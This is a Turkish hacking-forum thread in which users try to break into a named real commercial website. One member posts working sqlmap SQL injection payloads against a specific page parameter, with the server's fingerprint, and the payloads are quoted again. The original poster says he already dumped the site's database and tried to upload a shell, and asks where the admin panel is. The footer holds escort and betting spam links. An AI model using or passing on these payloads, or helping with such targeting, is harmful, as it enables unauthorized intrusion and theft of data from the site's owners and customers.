Admin Panel Yok Yardım ?

Sinyal

Yeni Üye
Katılım
1 Tem 2017
Mesajlar
7
Tepkime puanı
0
Puanları
0
Sa beyler elimde bi sitenin login bilgileri mevcut lakin ne yapıp ettimse admin panelini bulamadım bi yardım edermisiniz site 

http://starvida.com.tr/
 

KODADIHACK

Spys-Z
Katılım
19 Ağu 2016
Mesajlar
362
Tepkime puanı
0
Puanları
0
Pc Format Atım Hiçbir Admin Panel Bulucu Program yok turkce birseyler dene yonetim.asp gibi bol sans
 

Sinyal

Yeni Üye
Katılım
1 Tem 2017
Mesajlar
7
Tepkime puanı
0
Puanları
0
denedim kardeşim mavigen yapmış siteyi mavigen in diğer sitelerindeki kullandığı panel linklerinide denedim genede olmadı
 

Trsz_kwT

Özel Üye
Katılım
2 Ara 2017
Mesajlar
467
Tepkime puanı
0
Puanları
0
Site ASP de kodlanmasına rağmen statik olarak tasarlanmış.
Bu nedenle paneli yok.
Manuel olarak kod değişikliği yapılıyor.
Sitede sql server ve mail server var.
Bunlarda açık aranabilir.

Sistemde Sql Injection buldum. Payload larını paylaşıyorum...

------

Link:
http://starvida.com.tr/urunler_kat.asp?katid=44


Parameter: katid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: katid=44 RLIKE (SELECT (CASE WHEN (9350=9350) THEN 44 ELSE 0x28 END))

Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: katid=44 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(8490=8490,1))),0x71707a6a71,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: katid=44 AND SLEEP(5)

---

[12:22:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL >= 5.5
 

Sinyal

Yeni Üye
Katılım
1 Tem 2017
Mesajlar
7
Tepkime puanı
0
Puanları
0
Trsz_kwT' Alıntı:
Site ASP de kodlanmasına rağmen statik olarak tasarlanmış.
Bu nedenle paneli yok.
Manuel olarak kod değişikliği yapılıyor.
Sitede sql server ve mail server var.
Bunlarda açık aranabilir.

Sistemde Sql Injection buldum. Payload larını paylaşıyorum...

------

Link:
http://starvida.com.tr/urunler_kat.asp?katid=44


Parameter: katid (GET)
   Type: boolean-based blind
   Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
   Payload: katid=44 RLIKE (SELECT (CASE WHEN (9350=9350) THEN 44 ELSE 0x28 END))

   Type: error-based
   Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
   Payload: katid=44 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(8490=8490,1))),0x71707a6a71,0x78))s), 8446744073709551610, 8446744073709551610)))

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind
   Payload: katid=44 AND SLEEP(5)

---

[12:22:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL >= 5.5

sitede açık olduğunu bende biliyorum o yüzden bilgileri bende db sini çektim sqlmap ile shell yüklemeyi denedim olmadı o yüzden panel arıyorum
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012